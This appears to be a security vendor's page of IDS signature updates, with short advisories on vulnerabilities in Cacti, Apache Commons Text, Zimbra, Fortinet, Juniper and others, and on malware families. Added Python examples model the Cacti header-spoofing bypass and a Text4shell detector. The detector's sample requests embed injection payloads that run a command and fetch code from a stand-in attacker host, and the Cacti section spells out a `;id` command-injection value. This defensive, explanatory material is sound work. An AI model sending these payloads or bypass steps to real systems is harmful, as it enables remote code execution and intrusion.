
Rua Alexandre Dumas, 1711
Edifício Birmann 11, loja 02 térreo
Chácara Santo Antônio
04717-911
São Paulo – SP
Here you will find information about the latest threat signatures generated by our specialists.
sid: 2044585 and 2044145
Microsoft Outlook elevation of privilege vulnerability.
SID 60982
Fortra (formerly, HelpSystems) GoAnywhere MFT suffers from a pre-authentication command injection vulnerability in the License Response Servlet due to deserializing an arbitrary attacker-controlled object. This issue was patched in version 7.1.2.
IDs: 2044143, 2044144 and 2044145
An external control of file name or path in Fortinet FortiNAC versions 9.4.0, 9.2.0 through 9.2.5, 9.1.0 through 9.1.7, 8.8.0 through 8.8.11, 8.7.0 through 8.7.6, 8.6.0 through 8.6.5, 8.5.0 through 8.5.4, 8.3.7 may allow an unauthenticated attacker to execute unauthorized code or commands via a specifically crafted HTTP request.
2044146 – ET MALWARE Win32/Disabler.NPR Checkin (emerging-malware.rules)
2044147 – ET MALWARE Win32/CrimsonRAT Activity (Inbound) (emerging-malware.rules)
2044148 – ET MALWARE Win32/CrimsonRAT Activity (Outbound) (emerging-malware.rules)
2044176 – ET MALWARE SocGholish CnC Domain in DNS Lookup (* .distributor .techsavvyauto .com) (emerging-malware.rules)
2044177 – ET MALWARE SocGholish CnC Domain in DNS Lookup (* .picture .mercedesbestphoto .store) (emerging-malware.rules)
2044183 – ET MALWARE Backdoored Xpopup Domain (xpopup .pe .kr) in DNS Lookup (emerging-malware.rules)
2044184 – ET MALWARE Backdoored Xpopup Domain (xpopup .com) in DNS Lookup (emerging-malware.rules)
login/index.php in CWP (aka Control Web Panel or CentOS Web Panel) 7 before 0.9.8.1147 allows remote attackers to execute arbitrary OS commands via shell metacharacters in the login parameter.
Multiple Zoho ManageEngine on-premise products, such as ServiceDesk Plus through 14003, allow remote code execution due to use of Apache xmlsec (aka XML Security for Java) 1.4.1, because the xmlsec XSLT features, by design in that version, make the application responsible for certain security protections, and the ManageEngine applications did not provide those protections.
A buffer overflow in Xiongmai DVR devices NBD80X16S-KL, NBD80X09S-KL, NBD80X08S-KL, NBD80X09RA-KL, AHB80X04R-MH, AHB80X04R-MH-V2, AHB80X04-R-MH-V3, AHB80N16T-GS, AHB80N32F4-LME, and NBD90S0VT-QW allows attackers to cause a Denial of Service (DoS) via a crafted RSTP request.
New AppleJeus entries (recent Lazarus malware)
2041658 – ET TROJAN Observed DNS Query to AppleJeus Domain (strainservice .com) (emerging-trojan.rules)
2041659 – ET TROJAN Observed DNS Query to AppleJeus Domain (telloo .io) (emerging-trojan.rules)
2041660 – ET TROJAN Observed DNS Query to AppleJeus Domain (wirexpro .com) (emerging-trojan.rules)
2041661 – ET TROJAN Observed DNS Query to AppleJeus Domain (rebelthumb .net) (emerging-trojan.rules)
2041662 – ET TROJAN Observed DNS Query to AppleJeus Domain (oilycargo .com) (emerging-trojan.rules)
2041663 – ET TROJAN Observed DNS Query to AppleJeus Domain (bloxholder .com) (emerging-trojan.rules)
2041664 – ET TROJAN Win32/AppleJeus CnC Checkin (POST) (emerging-trojan.rules)
AMI MegaRAC Redfish Arbitrary Code Execution
Cacti is an open source platform which provides a robust and extensible operational monitoring and fault management framework for users. In affected versions a command injection vulnerability allows an unauthenticated user to execute arbitrary code on a server running Cacti, if a specific data source was selected for any monitored device.

The vulnerability resides in the `remote_agent.php` file, which can be accessed without authentication. Its authorization check retrieves the IP address of the client via `get_client_addr` and resolves this IP address to the corresponding hostname via `gethostbyaddr`. It then verifies that an entry exists in the `poller` table whose hostname corresponds to the resolved hostname. If such an entry is found, the function returns `true` and the client is authorized. This authorization can be bypassed because of how `get_client_addr` is implemented. The function is defined in the file `lib/functions.php` and checks several `$_SERVER` variables to determine the IP address of the client. The variables beginning with `HTTP_` can be set arbitrarily by an attacker. Since there is a default entry in the `poller` table with the hostname of the server running Cacti, an attacker can bypass the authentication, e.g. by providing the header `Forwarded-For: <TARGETIP>`. This way `get_client_addr` returns the IP address of the server running Cacti, and the following call to `gethostbyaddr` resolves it to the server's hostname, which passes the `poller` hostname check because of the default entry.

After the authorization of `remote_agent.php` is bypassed, an attacker can trigger different actions. One of these actions is called `polldata`. The called function `poll_for_data` retrieves a few request parameters and loads the corresponding `poller_item` entries from the database. If the `action` of a `poller_item` equals `POLLER_ACTION_SCRIPT_PHP`, the function `proc_open` is used to execute a PHP script. The attacker-controlled parameter `$poller_id` is retrieved via the function `get_nfilter_request_var`, which allows arbitrary strings. This variable is later inserted into the string passed to `proc_open`, which leads to a command injection vulnerability: providing e.g. `poller_id=;id` executes the `id` command. To reach the vulnerable call, the attacker must provide a `host_id` and `local_data_id` where the `action` of the corresponding `poller_item` is set to `POLLER_ACTION_SCRIPT_PHP`. Both of these ids (`host_id` and `local_data_id`) can easily be brute-forced. The only requirement is that a `poller_item` with a `POLLER_ACTION_SCRIPT_PHP` action exists, which is very likely on a production instance because this action is added by some predefined templates such as `Device – Uptime` or `Device – Polling Time`. In short, this command injection allows an unauthenticated user to execute arbitrary commands if a `poller_item` with the `action` type `POLLER_ACTION_SCRIPT_PHP` (`2`) is configured.

The authorization bypass should be prevented by not allowing an attacker to make `get_client_addr` (file `lib/functions.php`) return an arbitrary IP address. This could be done by not honoring the `HTTP_…` `$_SERVER` variables; if these must be kept for compatibility reasons, it should at least be impossible to fake the IP address of the server running Cacti. This vulnerability has been addressed in both the 1.2.x and 1.3.x release branches, with `1.2.23` being the first release containing the patch.
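The two weaknesses described above, the proxy-header trust in `get_client_addr` and the unvalidated `poller_id`, modeled in Python as an added example (this is not Cacti's PHP code). The poller table, the reverse-DNS answers and the IP addresses are constructed for the example; `client_addr_hardened` shows the fix the advisory recommends, trusting only the socket peer address.

```python
import ipaddress
import re

# Constructed stand-in for Cacti's `poller` table: the default row holds the
# hostname of the Cacti server itself, which is what the bypass relies on.
POLLER_TABLE = {"cacti.example.internal"}

# Constructed reverse-DNS answers, so the example runs offline instead of
# calling gethostbyaddr() the way remote_agent.php does.
REVERSE_DNS = {
    "10.0.0.5": "cacti.example.internal",   # the Cacti server's own address
    "203.0.113.7": "scanner.example.net",   # the attacker's address
}

# CGI-style variables as PHP exposes them in $_SERVER. Everything prefixed
# HTTP_ is copied verbatim from request headers and is attacker-controlled.
HEADER_KEYS = ("HTTP_X_FORWARDED_FOR", "HTTP_FORWARDED_FOR", "HTTP_CLIENT_IP")


def client_addr_vulnerable(server):
    """Models the weakness: forwarded headers are consulted before REMOTE_ADDR."""
    for key in HEADER_KEYS + ("REMOTE_ADDR",):
        value = server.get(key, "")
        if value:
            return value.split(",")[0].strip()
    return ""


def client_addr_hardened(server):
    """Only the TCP peer address is trusted; forwarded headers are ignored.
    (Behind a reverse proxy, honour the header only when REMOTE_ADDR is that
    proxy, never unconditionally.)"""
    return server.get("REMOTE_ADDR", "")


def remote_agent_authorized(server, addr_func):
    """The poller hostname check: resolve the client IP, require a poller row."""
    ip = addr_func(server)
    try:
        ipaddress.ip_address(ip)
    except ValueError:
        return False
    hostname = REVERSE_DNS.get(ip, ip)
    return hostname in POLLER_TABLE


def poller_id_is_valid(value):
    """poller_id is a database key, so anything but digits is an injection
    attempt; the `;id` payload from the advisory fails this check."""
    return re.fullmatch(r"[0-9]+", value) is not None


# Constructed request: the attacker connects directly from 203.0.113.7 but
# claims the Cacti server's own address in a Forwarded-For header.
SPOOFED_REQUEST = {"REMOTE_ADDR": "203.0.113.7", "HTTP_FORWARDED_FOR": "10.0.0.5"}


if __name__ == "__main__":
    print("vulnerable:", remote_agent_authorized(SPOOFED_REQUEST, client_addr_vulnerable))
    print("hardened:  ", remote_agent_authorized(SPOOFED_REQUEST, client_addr_hardened))
    print("poller_id=;id accepted:", poller_id_is_valid(";id"))
```

The spoofed request is authorized by the vulnerable resolver and rejected by the hardened one; a genuine request from the server's own address still passes. Note that fixing only the header trust is not enough: `poller_id` must also be validated before it reaches `proc_open`, which is why the second check is kept separate.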
gl-inet GL-MT300N-V2 Mango v3.212 and GL-AX1800 Flint v3.214 were discovered to contain multiple command injection vulnerabilities via the ping_addr and trace_addr function parameters.
A buffer overrun can be triggered in X.509 certificate verification, specifically in name constraint checking. Note that this occurs after certificate chain signature verification and requires either a CA to have signed the malicious certificate or for the application to continue certificate verification despite failure to construct a path to a trusted issuer. An attacker can craft a malicious email address to overflow four attacker-controlled bytes on the stack. This buffer overflow could result in a crash (causing a denial of service) or potentially remote code execution. Many platforms implement stack overflow protections which would mitigate against the risk of remote code execution. The risk may be further mitigated based on stack layout for any given platform/compiler. Pre-announcements of CVE-2022-3602 described this issue as CRITICAL. Further analysis based on some of the mitigating factors described above have led this to be downgraded to HIGH. Users are still encouraged to upgrade to a new version as soon as possible. In a TLS client, this can be triggered by connecting to a malicious server. In a TLS server, this can be triggered if the server requests client authentication and a malicious client connects. Fixed in OpenSSL 3.0.7 (Affected 3.0.0,3.0.1,3.0.2,3.0.3,3.0.4,3.0.5,3.0.6).
Bad-reputation IPs added to more than 200 port groups.
2039129 – ET EXPLOIT ZKBioSecurity SQL Injection Attempt (CVE-2022-36635) (emerging-exploit.rules)
ZKteco ZKBioSecurity V5000 4.1.3 was discovered to contain a SQL injection vulnerability via the component /baseOpLog.do.
A SQL injection vulnerability was found in a physical-security platform (elevators, access control, etc.) known as ZKBioSecurity v4.1.3.
2039141 – ET EXPLOIT Possible Zimbra Arbitrary File Upload (CVE-2022-41352) M1 (emerging-exploit.rules)
2039142 – ET EXPLOIT Possible Zimbra Arbitrary File Upload (CVE-2022-41352) M2 (emerging-exploit.rules)
2039143 – ET EXPLOIT Possible Zimbra Arbitrary File Upload (CVE-2022-41352) M4 (emerging-exploit.rules)
2039144 – ET EXPLOIT Possible Zimbra Arbitrary File Upload (CVE-2022-41352) M3 (emerging-exploit.rules)
2039145 – ET EXPLOIT Possible Zimbra Arbitrary File Upload (CVE-2022-41352) M6 (emerging-exploit.rules)
2039146 – ET EXPLOIT Possible Zimbra Arbitrary File Upload (CVE-2022-41352) M5 (emerging-exploit.rules)
2039147 – ET EXPLOIT Possible Zimbra Arbitrary File Upload (CVE-2022-41352) M7 (emerging-exploit.rules)
2039148 – ET EXPLOIT Possible Zimbra Arbitrary File Upload (CVE-2022-41352) M8 (emerging-exploit.rules)
An issue was discovered in Zimbra Collaboration (ZCS) 8.8.15 and 9.0. An attacker can upload arbitrary files through amavisd via a cpio loophole (extraction to /opt/zimbra/jetty/webapps/zimbra/public) that can lead to incorrect access to any other user accounts. Zimbra recommends pax over cpio. Also, pax is in the prerequisites of Zimbra on Ubuntu; however, pax is no longer part of a default Red Hat installation after RHEL 6 (or CentOS 6). Once pax is installed, amavisd automatically prefers it over cpio.
A vulnerability found in Zimbra, where an attacker could upload an arbitrary file through the cpio loophole, which led to access to other accounts.
2039149 – ET EXPLOIT Possible Zimbra Arbitrary File Upload (CVE-2022-30333) M1 (emerging-exploit.rules)
2039150 – ET EXPLOIT Possible Zimbra Arbitrary File Upload (CVE-2022-30333) M2 (emerging-exploit.rules)
2039173 – ET WEB_SERVER [Cluster25] FortiOS Auth Bypass Attempt (CVE-2022-40684) (emerging-web_server.rules)
2039419 – ET WEB_SERVER Successful FortiOS Auth Bypass Attempt – SSH Key Upload (CVE-2022-40684) (emerging-web_server.rules)
2039420 – ET WEB_SERVER Successful FortiOS Auth Bypass Attempt – Admin Details Leaked (CVE-2022-40684) (emerging-web_server.rules)
An authentication bypass using an alternate path or channel [CWE-288] in Fortinet FortiOS version 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy version 7.2.0 and version 7.0.0 through 7.0.6 and FortiSwitchManager version 7.2.0 and 7.0.0 allows an unauthenticated attacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests.
An authentication bypass flaw found in Fortinet's FortiOS (version 7.2).
2039464 – ET EXPLOIT Possible Apache Text4shell RCE Attempt Script Prefix (CVE-2022-42889) (Inbound) (emerging-exploit.rules)
2039465 – ET EXPLOIT Possible Apache Text4shell RCE Attempt Script Prefix (CVE-2022-42889) (Outbound) (emerging-exploit.rules)
2039466 – ET EXPLOIT Possible Apache Text4shell RCE Attempt DNS Prefix (CVE-2022-42889) (Inbound) (emerging-exploit.rules)
2039467 – ET EXPLOIT Possible Apache Text4shell RCE Attempt DNS Prefix (CVE-2022-42889) (Outbound) (emerging-exploit.rules)
2039468 – ET EXPLOIT Possible Apache Text4shell RCE Attempt URL Prefix (CVE-2022-42889) (Inbound) (emerging-exploit.rules)
2039469 – ET EXPLOIT Possible Apache Text4shell RCE Attempt URL Prefix (CVE-2022-42889) (Outbound) (emerging-exploit.rules)
2039470 – ET EXPLOIT Possible Apache Text4shell RCE Attempt URL Prefix (CVE-2022-42889) (Inbound) (emerging-exploit.rules)
2039471 – ET EXPLOIT Possible Apache Text4shell RCE Attempt URL Prefix (CVE-2022-42889) (Outbound) (emerging-exploit.rules)
Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is “${prefix:name}”, where “prefix” is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are:
“script” – execute expressions using the JVM script execution engine (javax.script)
“dns” – resolve DNS records
“url” – load values from URLs, including from remote servers
Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Text 1.10.0, which disables the problematic interpolators by default.
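What the Text4shell signatures above look for, written as an added Python detector over constructed request lines (example code, not the Emerging Threats rules themselves and not Apache's code). It matches the three dangerous prefixes inside `${prefix:` regardless of case and after undoing percent-encoding, so a payload hidden behind URL encoding, which a naive substring match on `${script:` would miss, is still flagged; the safe default `date` lookup is deliberately not flagged.

```python
import re
from urllib.parse import unquote

# The three default StringLookup prefixes that Commons Text 1.5-1.9 enabled and
# that 1.10.0 turns off: code execution, DNS resolution and URL fetching.
DANGEROUS_PREFIXES = ("script", "dns", "url")

# "${" optional whitespace, one of the prefixes, optional whitespace, ":".
PATTERN = re.compile(r"\$\{\s*(" + "|".join(DANGEROUS_PREFIXES) + r")\s*:", re.IGNORECASE)


def normalize(data, rounds=2):
    """Undo up to `rounds` layers of percent-encoding (double encoding is a
    common way to slip past a single-decode match)."""
    for _ in range(rounds):
        decoded = unquote(data)
        if decoded == data:
            break
        data = decoded
    return data


def find_text4shell(data):
    """Return the dangerous interpolator prefixes found in one request chunk,
    lower-cased, in order of appearance."""
    return [m.group(1).lower() for m in PATTERN.finditer(normalize(data))]


def scan(requests):
    """Map request index -> prefixes found, for every request that matched."""
    result = {}
    for i, req in enumerate(requests):
        hits = find_text4shell(req)
        if hits:
            result[i] = hits
    return result


# Constructed request lines; none of these were captured from a real host.
SAMPLE_REQUESTS = [
    "GET /search?q=hello HTTP/1.1",
    "GET /search?q=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27id%27%29%7D HTTP/1.1",
    'POST /api/profile {"name": "${dns:address|attacker.example}"}',
    "GET /?u=${URL:UTF-8:http://attacker.example/payload} HTTP/1.1",
    "GET /?x=${date:yyyy-MM-dd} HTTP/1.1",
]

if __name__ == "__main__":
    for idx, prefixes in scan(SAMPLE_REQUESTS).items():
        print("request %d: %s" % (idx, ", ".join(prefixes)))
```

On the constructed input only requests 1, 2 and 3 match (script, dns and url respectively). As with the Emerging Threats rules, a match means an attempt, not a successful exploit: it says nothing about whether the receiving application passes that value to `StringSubstitutor` at all.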
2039591 – ET TROJAN Potential Juniper Phar Deserialization RCE Attempt (CVE-2022-22241) (emerging-trojan.rules)
An Improper Input Validation vulnerability in the J-Web component of Juniper Networks Junos OS may allow an unauthenticated attacker to access data without proper authorization. Utilizing a crafted POST request, deserialization may occur which could lead to unauthorized local file access or the ability to execute arbitrary commands. This issue affects Juniper Networks Junos OS: all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R2-S7, 19.4R3-S9; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S2; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R2-S2, 21.3R3; 21.4 versions prior to 21.4R1-S2, 21.4R2-S1, 21.4R3; 22.1 versions prior to 22.1R1-S1, 22.1R2.
A vulnerability found in a component of Junos OS allowed an unauthenticated attack using a crafted POST request, leading to local file access.
2039592 – ET TROJAN Potential Juniper XPATH Injection Attempt (CVE-2022-22244) (emerging-trojan.rules)
2039598 – ET TROJAN Potential Juniper Reflected XSS Attempt (CVE-2022-22242) (emerging-trojan.rules)
A Cross-site Scripting (XSS) vulnerability in the J-Web component of Juniper Networks Junos OS allows an unauthenticated attacker to run malicious scripts reflected off of J-Web to the victim’s browser in the context of their session within J-Web. This issue affects Juniper Networks Junos OS all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R2-S7, 19.4R3-S8; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S4; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R3; 21.4 versions prior to 21.4R2; 22.1 versions prior to 22.1R2.
XSS vulnerability found in Junos OS.
2039599 – ET TROJAN Potential Juniper Path Traversal RCE Attempt (CVE-2022-22245) (emerging-trojan.rules)
A Path Traversal vulnerability in the J-Web component of Juniper Networks Junos OS allows an authenticated attacker to upload arbitrary files to the device by bypassing validation checks built into Junos OS. The attacker should not be able to execute the file due to validation checks built into Junos OS. Successful exploitation of this vulnerability could lead to loss of filesystem integrity. This issue affects Juniper Networks Junos OS: all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R3-S9; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S2; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R2-S2, 21.3R3; 21.4 versions prior to 21.4R1-S2, 21.4R2-S1, 21.4R3; 22.1 versions prior to 22.1R1-S1, 22.1R2.
2039600 – ET TROJAN Potential Juniper PHP Local File Inclusion Attempt (CVE-2022-22246) (emerging-trojan.rules)
A PHP Local File Inclusion (LFI) vulnerability in the J-Web component of Juniper Networks Junos OS may allow a low-privileged authenticated attacker to execute an untrusted PHP file. By chaining this vulnerability with other unspecified vulnerabilities, and by circumventing existing attack requirements, successful exploitation could lead to a complete system compromise. This issue affects Juniper Networks Junos OS: all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S6; 19.4 versions prior to 19.4R2-S7, 19.4R3-S8; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S2; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R2-S2, 21.3R3; 21.4 versions prior to 21.4R1-S2, 21.4R2-S1, 21.4R3; 22.1 versions prior to 22.1R1-S1, 22.1R2.
Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming.
New ET MALWARE TA453/APT35 HYPERSCRAPE signatures have been added to Blockbit UTM and made available in our official repository.
Hyperscrape: the attackers run it on their own machines to download e-mails from victims' inboxes using previously acquired credentials, and then delete the traces of the application's activity.
Trojan:OSX/Shlayer identifies a file that appears to be an update for a popular media player but, when launched, instead runs scripts that download other unwanted programs onto the computer.
Confucius is a cyber espionage group that has primarily targeted military personnel, high-profile personalities, business persons, and government organizations in South Asia since at least 2013. Security researchers have noted similarities between Confucius and Patchwork, particularly in their respective custom malware code and targets.
VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the user interface can obtain administrative access without needing to authenticate.
Signature generated by Blockbit:
This signature matches a Facebook landing page capable of stealing login credentials.
Signature generated by Blockbit:
sid: 2037869
ET CURRENT_EVENTS Facebook Credential Theft Landing Page 2022-07-29 (emerging-current_events.rules)
The Lazarus Group has strong ties to North Korea. North Korea benefits from conducting cyber operations because it can pose an asymmetric threat with a small group of operators, especially against South Korea.
Signature generated by Blockbit:
This cyber-espionage group targets various high-level diplomats and economists with international ties to China, using a custom set of attack tools. The attacks were generally carried out through spear-phishing campaigns or watering-hole attacks.
Signature generated by Blockbit:
Signatures generated by Blockbit:
Signatures generated by Blockbit:
Zimbra Collaboration (also known as ZCS) 8.8.15 and 9.0 has the mboximport functionality, which receives a ZIP file and extracts files from it. An authenticated user with administrator rights can upload arbitrary files to the system, leading to directory traversal.
Signature generated by Blockbit:
The vulnerability is a critical remote code execution (RCE) flaw (CVSS: 9.8) affecting VMware Workspace ONE Access and VMware Identity Manager, two widely used software products.
Signatures generated by Blockbit
Signatures generated by Blockbit
sid:2036731
Adobe ColdFusion 11 – LDAP Java Object Deserialization RCE (GET) CVE-2018-15957
sid:2036732
Adobe ColdFusion 11 – LDAP Java Object Deserialization RCE (POST) CVE-2018-15957
Signature generated by Blockbit
A ransomware attack was deployed against an unnamed target, using a Mitel VoIP appliance as the entry point.
Signature generated by Blockbit
A command injection vulnerability in the web interface of the Zyxel NWA-1100-NH firmware could allow an attacker to execute arbitrary OS commands on the device.
Signature generated by Blockbit
Rated high severity, the vulnerability in question affects the Microsoft Support Diagnostic Tool (MSDT) and can be exploited by cybercriminals to execute malicious code remotely.
Signatures generated by Blockbit
When files are uploaded to dotCMS through a content API, dotCMS writes the file to a temporary directory. In the case of this vulnerability, dotCMS does not sanitize the filename passed in the multipart request header and therefore does not sanitize the temporary file name either.
Signatures generated by Blockbit
sid:2036457
dotCMS Arbitrary File Upload Attempt M1
This vulnerability affects Zyxel firewalls that support Zero Touch Provisioning (ZTP), which includes the ATP, VPN and USG FLEX series (including USG20-VPN and USG20W-VPN). The vulnerability, tracked as CVE-2022-30525, allows a remote, unauthenticated attacker to achieve arbitrary code execution as the nobody user on the affected device.
Signature generated by Blockbit
sid:2036596
[Rapid7] Zyxel ZTP setWanPortSt mtu Parameter Exploit Attempt (CVE 2022-30525)
Apache recently issued a risk advisory for a remote code execution vulnerability in Apache CouchDB, tracked as CVE-2022-24706 and rated critical.
In Apache CouchDB prior to version 3.2.2, an attacker can access an improperly secured default installation without authentication and gain administrator privileges.
Signature generated by Blockbit
Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.
Signature generated by Blockbit
Given the potentially extensive impact of this vulnerability, users are advised to stay alert and take the necessary measures to protect themselves.
Signatures generated by Blockbit
An authentication bypass vulnerability in the User Portal and Webadmin allows a remote attacker to execute code on Sophos Firewall version v18.5 MR3 and earlier.
Signatures generated by Blockbit
The vulnerability is a critical remote code execution (RCE) flaw (CVSS: 9.8) affecting VMware Workspace ONE Access and VMware Identity Manager, two widely used software products.
Signatures generated by Blockbit
A recently disclosed F5 BIG-IP vulnerability was used in destructive attacks that attempted to wipe a device's file system and render the server unusable.
Signatures generated by Blockbit
An nginx zero-day RCE issue was identified in the implementation of the nginx LDAP-auth daemon, details of which briefly leaked.
Signature generated by Blockbit
Redis, a persistent key-value database, was found to be prone to a Lua sandbox escape (Debian-specific) due to a packaging issue, which could result in remote code execution.
Signatures generated by Blockbit
This is a digital signature bypass vulnerability in Java, caused by a faulty implementation of the Elliptic Curve Digital Signature Algorithm (ECDSA). The flaw makes Java accept a blank signature as a valid signature.
Signatures generated by Blockbit
Kwampirs is a remote access trojan capable of gaining access to machines and networks.
Signature generated by Blockbit
Sid 2023595 TROJAN Trojan.Kwampirs Outbound GET request
Trickbot emerged as a banking trojan and grew into powerful malware capable of stealing data, launching ransomware attacks and destroying files.
Signatures generated by Blockbit
Sid 2023727 TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (TrickBot CnC)
Sid 2033659 TROJAN Win32/TrickBot CnC Initial Checkin M2
Loki Locker is a threat capable of infecting systems, encrypting stored files and extorting money from its victims.
Signature generated by Blockbit
Sid 2035510 MALWARE Loki Locker Ransomware User-Agent
DarkHotel is an espionage campaign that uses fake certificates on hotel Wi-Fi networks to deceive executives staying at luxury hotels.
Signature generated by Blockbit
Sid 2021609 TROJAN Possible DarkHotel Landing M1
CaddyWiper is malicious software designed to wipe the data stored on infected devices. Although it is also a wiper, CaddyWiper has no significant similarities with HermeticWiper or IsaacWiper.
Signature generated by Blockbit
Sid 59268 MALWARE-OTHER Win.Trojan.CaddyWiper download attempt Rule
A cybercriminal group responsible for APT (Advanced Persistent Threat) attacks.
Signatures generated by Blockbit
Sid 2035551 TROJAN Suspected Mustang Panda APT Related Activity (GET)
Sid 2035552 TROJAN Suspected Mustang Panda APT Related Activity (GET)
Scarab is a type of ransomware that infiltrates the system and steals various data.
Signature generated by Blockbit
Sid 2035557 TROJAN Scarab APT Related Domain in DNS Lookup
Verblecon is a threat that works as a loader, dropping other malicious content onto the devices it infects.
Signatures generated by Blockbit
Sid 2035659 TROJAN Trojan.Verblecon User Agent Observed
Sid 2035660 TROJAN Trojan.Verblecon Related Domain in DNS Lookup (gaymers .ax)
Sid 2035661 TROJAN Observed Trojan.Verblecon Related Domain (gaymers .ax in TLS SNI)
Sid 2035662 TROJAN Trojan.Verblecon Related Domain in DNS Lookup (jonathanhardwick .me)
Sid 2035663 TROJAN Observed Trojan.Verblecon Related Domain (jonathanhardwick .me in TLS SNI)
Sid 2035664 TROJAN Trojan.Verblecon Related Domain in DNS Lookup (.verble .rocks)
Sid 2035665 TROJAN Observed Trojan.Verblecon Related Domain (.verble .rocks in TLS SNI)
Sid 2035666 TROJAN Trojan.Verblecon Related Domain in DNS Lookup (verble .software)
Sid 2035667 TROJAN Observed Trojan.Verblecon Related Domain (verble .software in TLS SNI)
CrimsonRAT is a remote access trojan that has been found in spear-phishing e-mails carrying malicious Microsoft Office documents.
Signatures generated by Blockbit
Sid 2035598 TROJAN Win32/CrimsonRAT Variant Sending Command (inbound)
Sid 2035599 TROJAN Win32/CrimsonRAT Variant Sending Command M2 (inbound)
Sid 2035600 TROJAN Win32/CrimsonRAT Variant Sending System Information (outbound)
Considered the biggest zero-day of the last decade, Log4Shell is a vulnerability found in the open-source Apache Log4j library.
Signatures generated by Blockbit
DNS Query for Observed CVE-2021-44228 Security Scanner Domain (log4shell .huntress .com)
VMWare vSphere log4shell exploit attempt
Sid 2034820
Sid 58811
Sid 58812
Sid 58813
CVE-2021-44228
CVE-2021-44832
CVE-2021-45046
CVE-2021-45105
Regarded as the new Log4j, Spring4Shell is a vulnerability affecting Spring Core, a framework widely used in Java applications.
Signatures generated by Blockbit
Sid 2035670 Possible Spring Cloud Connector RCE Inbound (CVE-2022-22963)
Sid 2035674 Possible SpringCore RCE/Spring4Shell Stage 1 Pattern Set Inbound (Unassigned)
Sid 2035675 Possible SpringCore RCE/Spring4Shell Stage 2 Suffix Set Inbound (Unassigned)
Sid 2035676 Possible SpringCore RCE/Spring4Shell Stage 3 Directory Set Inbound (Unassigned)
Sid 2035677 Possible SpringCore RCE/Spring4Shell Stage 4 Prefix Set Inbound (Unassigned)
Sid 2035678 Possible SpringCore RCE/Spring4Shell Inbound (Unassigned)
© Blockbit 2023 – Todos os direitos reservados.